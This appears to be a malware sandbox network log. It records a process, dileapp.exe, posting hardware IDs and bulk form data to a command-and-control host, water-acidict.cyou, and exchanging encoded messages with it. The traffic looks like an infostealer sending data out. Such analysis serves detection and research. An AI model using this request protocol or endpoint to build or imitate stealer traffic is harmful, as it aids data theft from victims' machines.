                                                                                                                                      2024-11-29 22:10:21 UTC1237OUTData Raw: 2d 2d 46 39 54 46 30 34 32 51 46 4d 37 34 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 45 44 38 44 42 30 36 34 37 33 39 45 33 36 32 37 32 34 45 39 32 36 43 45 34 39 35 44 39 46 0d 0a 2d 2d 46 39 54 46 30 34 32 51 46 4d 37 34 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 46 39 54 46 30 34 32 51 46 4d 37 34 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c 0d 0a 2d 2d 46 39 54 46 30 34 32 51 46 4d 37
                                                                                                                                      Data Ascii: --F9TF042QFM74QContent-Disposition: form-data; name="hwid"97ED8DB064739E362724E926CE495D9F--F9TF042QFM74QContent-Disposition: form-data; name="pid"1--F9TF042QFM74QContent-Disposition: form-data; name="lid"c2CoW0--bandl--F9TF042QFM7
                                                                                                                                      2024-11-29 22:10:22 UTC | 1022 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:22 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=6m5bh2gimva0kprlg7tfr59h03; expires=Tue, 25-Mar-2025 15:57:00 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pd2SaVMnuYU8slpcI%2B6wjF96VbUsdtlyw062xBOLtaap6H2ORDtwCSnr9hqv7y%2FrEvmgX083tXprSVe4HRXrGidzLrzY1%2Fqh%2BNv3BrUh5V735m3hNDnstq%2BufpvFpnjkPg%2Bkbyg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed662b833350-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1998&min_rtt=1994&rtt_var=757&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2151&delivery_rate=1437715&cwnd=173&unsent_bytes=0&cid=1ddef182a3da8007&ts=732&x=0"
                                                                                                                                      2024-11-29 22:10:22 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.228


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      13 | 192.168.2.4 | 49759 | 172.67.156.217 | 443 | 7568 | C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:10:22 UTC | 282 | OUT | POST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=7O7ELFMD4GMH0W3O
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 18356
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:22 UTC15331OUTData Raw: 2d 2d 37 4f 37 45 4c 46 4d 44 34 47 4d 48 30 57 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 45 44 38 44 42 30 36 34 37 33 39 45 33 36 32 37 32 34 45 39 32 36 43 45 34 39 35 44 39 46 0d 0a 2d 2d 37 4f 37 45 4c 46 4d 44 34 47 4d 48 30 57 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 4f 37 45 4c 46 4d 44 34 47 4d 48 30 57 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c 0d 0a 2d 2d 37 4f
                                                                                                                                      Data Ascii: --7O7ELFMD4GMH0W3OContent-Disposition: form-data; name="hwid"97ED8DB064739E362724E926CE495D9F--7O7ELFMD4GMH0W3OContent-Disposition: form-data; name="pid"2--7O7ELFMD4GMH0W3OContent-Disposition: form-data; name="lid"c2CoW0--bandl--7O
                                                                                                                                      2024-11-29 22:10:23 UTC | 1021 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:23 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=ukca50kjof1k98jccfscffa0pp; expires=Tue, 25-Mar-2025 15:57:02 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6EdujJ43PWeFIQvw%2B6%2FQXBTZBJqwJSPeCilVlcL3CngZ3a54ebGBQB9xxHn7jJBggxpQ4S%2BWthWou047GTJZ4ZWK%2B3tUum7AaSeZTvfapynn5wyGbXaqM4dqx3wbAPIY0PMx3mA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed6e2ee7c331-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1824&min_rtt=1717&rtt_var=720&sent=13&recv=21&lost=0&retrans=0&sent_bytes=2844&recv_bytes=19318&delivery_rate=1700640&cwnd=74&unsent_bytes=0&cid=eed05278dca39b1a&ts=1103&x=0"
                                                                                                                                      2024-11-29 22:10:23 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.228
                                                                                                                                      2024-11-29 22:10:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      14 | 192.168.2.4 | 49760 | 172.67.156.217 | 443 | 7984 | C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-11-29 22:10:24 UTC | 280 | OUT | POST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=A4G2E3A0678O4
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 305412
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:24 UTC15331OUTData Raw: 2d 2d 41 34 47 32 45 33 41 30 36 37 38 4f 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 45 44 38 44 42 30 36 34 37 33 39 45 33 36 32 37 32 34 45 39 32 36 43 45 34 39 35 44 39 46 0d 0a 2d 2d 41 34 47 32 45 33 41 30 36 37 38 4f 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 34 47 32 45 33 41 30 36 37 38 4f 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c 0d 0a 2d 2d 41 34 47 32 45 33 41 30 36 37 38
                                                                                                                                      Data Ascii: --A4G2E3A0678O4Content-Disposition: form-data; name="hwid"97ED8DB064739E362724E926CE495D9F--A4G2E3A0678O4Content-Disposition: form-data; name="pid"1--A4G2E3A0678O4Content-Disposition: form-data; name="lid"c2CoW0--bandl--A4G2E3A0678
2024-11-29 22:10:26 UTC | 1015 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:25 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=pablmqhmh8e907drugkktsb37d; expires=Tue, 25-Mar-2025 15:57:04 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UrtTY9q7IllkDMBEbxDfrShWgM7NAYwfieLlGmd7MiFjWdfWKTB2KcrSTwqYIk0XkMTmAo3w0YU2zr1auuluk3CmSTsttqbTxHRNQld2RHZBd6ljurtCDy7jNbdK7J9KEbvufpg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed759a46c35e-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1615&rtt_var=807&sent=114&recv=323&lost=0&retrans=1&sent_bytes=4230&recv_bytes=307186&delivery_rate=160518&cwnd=59&unsent_bytes=0&cid=e590ecbcff20485b&ts=2074&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49762 | 172.67.156.217 | 443 | 7568 | C:\Users\Public\Netstat\dileapp.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:10:25 UTC | 279 | OUT | POST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=D6TA5K3NY9GB10
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 8760
                                                                                                                                      Host: water-acidict.cyou
2024-11-29 22:10:25 UTC | 8760 | OUT | Data Raw: 2d 2d 44 36 54 41 35 4b 33 4e 59 39 47 42 31 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 45 44 38 44 42 30 36 34 37 33 39 45 33 36 32 37 32 34 45 39 32 36 43 45 34 39 35 44 39 46 0d 0a 2d 2d 44 36 54 41 35 4b 33 4e 59 39 47 42 31 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 44 36 54 41 35 4b 33 4e 59 39 47 42 31 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c 0d 0a 2d 2d 44 36 54 41 35 4b 33 4e
                                                                                                                                      Data Ascii: --D6TA5K3NY9GB10Content-Disposition: form-data; name="hwid"97ED8DB064739E362724E926CE495D9F--D6TA5K3NY9GB10Content-Disposition: form-data; name="pid"2--D6TA5K3NY9GB10Content-Disposition: form-data; name="lid"c2CoW0--bandl--D6TA5K3N
2024-11-29 22:10:26 UTC | 1024 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:26 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=q9mqsm1krusn03sh21elu48rhu; expires=Tue, 25-Mar-2025 15:57:04 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NY%2FyNn4pij6D88sO27xQJz8Z5hZz9RSvWSkRrRaq%2FFWI26wCfOSGZoc2IFTIEqYcAmGv%2FiH0BoEfmjLutAHeGcJc34eZ4cagmljkM%2FeWFjO8NFsnRuY0uk%2BtOsJoixmNkfDV%2FsI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed7dcf700f83-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1680&min_rtt=1664&rtt_var=636&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2844&recv_bytes=9697&delivery_rate=1754807&cwnd=223&unsent_bytes=0&cid=b333488df87c1b04&ts=1130&x=0"
2024-11-29 22:10:26 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
Data Ascii: fok 8.46.123.228
2024-11-29 22:10:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49763 | 172.67.156.217 | 443 | 5448 | C:\Users\Public\Netstat\dileapp.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:10:25 UTC | 265 | OUT | POST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 8
                                                                                                                                      Host: water-acidict.cyou
2024-11-29 22:10:25 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                      Data Ascii: act=life
2024-11-29 22:10:26 UTC | 1015 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:26 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=gkfjjn6vb88so1iefii1jqn5ag; expires=Tue, 25-Mar-2025 15:57:05 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ox7nrjLuEip8uMXk%2F%2BccfhTPpObe28tZWHDkOfREjjM9sqjJ6lZBYLFYThooCcGeMs0KEsDBQgzoBp3tNS98DbuI0iy%2FGzTHqs7mhyMWpTNKAUJStVvAvPseO00ot3pjUjTvye8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed81dc4f0fa9-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1590&rtt_var=608&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=1780487&cwnd=252&unsent_bytes=0&cid=a82e9e2baf3f8671&ts=882&x=0"
2024-11-29 22:10:26 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-11-29 22:10:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49764 | 172.67.156.217 | 443 | 7984 | C:\Users\Public\Netstat\dileapp.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:10:27 UTC | 266 | OUT | POST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 82
                                                                                                                                      Host: water-acidict.cyou
2024-11-29 22:10:27 UTC | 82 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c 26 6a 3d 26 68 77 69 64 3d 39 37 45 44 38 44 42 30 36 34 37 33 39 45 33 36 32 37 32 34 45 39 32 36 43 45 34 39 35 44 39 46
                                                                                                                                      Data Ascii: act=get_message&ver=4.0&lid=c2CoW0--bandl&j=&hwid=97ED8DB064739E362724E926CE495D9F
2024-11-29 22:10:28 UTC | 1023 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:28 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=lhsfv3hg4rnh0aa316ru5i0np2; expires=Tue, 25-Mar-2025 15:57:06 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F2NyIRF9YuCaK0%2By1uoIDDKOtrSiFrMDs76GcKnxP8sP4BDy0XCVn1Ah%2FptXImulE4KBd6SBLmhWD45zDaa%2F4GGh5ygAl4L3Mz%2BBmQKya1Wo%2FHMaJxF7p%2FipFBvZXp2ni%2F2s68w%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed8b0b408c63-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1881&min_rtt=1799&rtt_var=733&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=984&delivery_rate=1623123&cwnd=223&unsent_bytes=0&cid=616bf786e8f1e20b&ts=867&x=0"
2024-11-29 22:10:28 UTC | 54 | IN | Data Raw: 33 30 0d 0a 38 6a 57 4f 34 42 64 69 33 59 37 5a 70 56 4e 6b 73 5a 46 54 6f 49 70 49 66 61 6b 55 71 4c 4f 66 48 61 33 68 30 63 56 65 63 4e 57 70 61 41 3d 3d 0d 0a
Data Ascii: 308jWO4Bdi3Y7ZpVNksZFToIpIfakUqLOfHa3h0cVecNWpaA==
2024-11-29 22:10:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49766 | 172.67.156.217 | 443 | 5448 | C:\Users\Public\Netstat\dileapp.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-29 22:10:28 UTC | 266 | OUT | POST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 47
                                                                                                                                      Host: water-acidict.cyou
2024-11-29 22:10:28 UTC | 47 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c 26 6a 3d
                                                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=c2CoW0--bandl&j=
2024-11-29 22:10:28 UTC | 1019 | IN | HTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:28 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=ehfc0hsbdq72sv3lh5d7f1m3oi; expires=Tue, 25-Mar-2025 15:57:07 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iDyFFq8mt%2FHjVdndu7f2NjImcpM0MHYxVyKMcU%2BRVxzRICtTb0FV7EDJqTQfHrCL9i%2FXnC2Mgqi6pCqnBqCsUsLSGeV%2FzstSqpkVkt55igutNf8wcMuWwq%2FRB3LuP9pNlydFXX0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed8f78997c90-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1815&min_rtt=1801&rtt_var=704&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=949&delivery_rate=1523213&cwnd=252&unsent_bytes=0&cid=4b4a1269864de9b9&ts=687&x=0"
                                                                                                                                      Data Ascii: tcgyIFGyD18rcFtnAu+0USYk6MA/x84Py7tmbyQdSNm11nxqFJUbUy50H3BP9vBSLWGzjDjOyADFtGxjLVcDmbnNMzZSsA9QKXBeaQTlu1MsIu3KdI6NB9fyMCYLRguVtY4jfE30B1xiIR9kDeu3VSwi48kwysgAx6BgZixPFJm7yzAxVLAGWSR6Wy9Pr7dNYXmr4TjH5AfU8ncoMh0BlfKWfDNfvg9dIX9cZATlsVIpLPnPO8/JAMC0bmckWwG
                                                                                                                                      2024-11-29 22:10:28 UTC1369INData Raw: 6a 45 54 69 6a 35 33 4e 48 4e 59 66 77 62 34 76 78 56 76 59 65 53 4d 62 50 6d 4e 43 63 69 70 65 58 41 6d 54 51 48 5a 6a 59 42 38 4b 68 54 73 51 47 55 68 64 31 46 6f 46 2f 37 39 63 6a 63 72 37 4e 77 7a 31 38 4a 41 67 66 4a 75 4a 6e 4d 4f 53 4e 6d 32 33 33 78 71 42 4f 5a 62 42 58 45 75 44 7a 30 65 6f 61 6b 56 4e 32 47 7a 6e 6e 71 41 33 30 43 58 38 69 39 6c 4f 55 38 41 6d 71 54 4e 65 77 78 71 6b 78 70 64 4a 47 35 4f 55 54 2f 6f 71 6c 67 6e 4e 76 71 41 49 63 50 44 44 73 69 6b 4b 43 68 72 55 6b 62 42 69 34 35 30 63 6d 76 36 51 45 68 69 49 52 39 61 41 75 47 2b 55 6a 63 77 70 75 73 75 7a 63 73 58 33 76 49 6d 4a 69 30 64 58 73 6e 38 6a 6a 67 6a 46 4f 78 51 41 6e 6b 73 44 44 68 52 76 61 38 62 4f 47 48 39 6a 47 79 53 67 30 44 64 38 6a 41 6d 62 46 34 55 69 37 54 4e
                                                                                                                                      Data Ascii: jETij53NHNYfwb4vxVvYeSMbPmNCcipeXAmTQHZjYB8KhTsQGUhd1FoF/79cjcr7Nwz18JAgfJuJnMOSNm233xqBOZbBXEuDz0eoakVN2GznnqA30CX8i9lOU8AmqTNewxqkxpdJG5OUT/oqlgnNvqAIcPDDsikKChrUkbBi450cmv6QEhiIR9aAuG+UjcwpusuzcsX3vImJi0dXsn8jjgjFOxQAnksDDhRva8bOGH9jGySg0Dd8jAmbF4Ui7TN
                                                                                                                                      2024-11-29 22:10:28 UTC1369INData Raw: 51 59 45 48 6f 35 61 6d 77 50 34 62 64 44 4d 47 7a 4d 77 6a 50 42 32 78 44 59 76 53 67 6f 61 31 74 47 77 65 43 41 66 44 5a 46 39 46 67 41 63 43 49 4b 50 46 61 2f 34 6b 70 76 4f 4b 76 61 64 4a 69 66 54 6f 2b 67 4b 44 35 72 47 67 57 4c 6f 4d 67 2f 4a 46 66 7a 50 6d 34 46 64 31 68 75 46 2f 2b 6e 57 6d 34 50 33 65 30 4b 2f 74 67 44 77 62 78 76 63 44 6f 64 53 4e 6d 39 6a 6d 51 4c 46 50 78 41 62 32 77 35 52 79 39 5a 72 34 56 57 4c 79 2f 73 32 69 57 4e 36 67 37 49 73 33 35 32 50 46 4a 4a 74 34 54 76 66 48 77 55 73 6b 41 49 63 44 63 66 61 78 43 76 36 41 56 7a 65 72 36 66 59 35 43 66 48 34 47 72 4b 48 42 72 42 56 54 58 38 74 78 38 61 68 54 7a 41 30 49 77 66 31 78 35 41 71 69 4f 61 77 59 76 37 4d 30 69 30 4d 41 4d 37 72 46 35 62 42 56 6a 45 35 71 38 77 44 73 6b 52
                                                                                                                                      Data Ascii: QYEHo5amwP4bdDMGzMwjPB2xDYvSgoa1tGweCAfDZF9FgAcCIKPFa/4kpvOKvadJifTo+gKD5rGgWLoMg/JFfzPm4Fd1huF/+nWm4P3e0K/tgDwbxvcDodSNm9jmQLFPxAb2w5Ry9Zr4VWLy/s2iWN6g7Is352PFJJt4TvfHwUskAIcDcfaxCv6AVzer6fY5CfH4GrKHBrBVTX8tx8ahTzA0Iwf1x5AqiOawYv7M0i0MAM7rF5bBVjE5q8wDskR
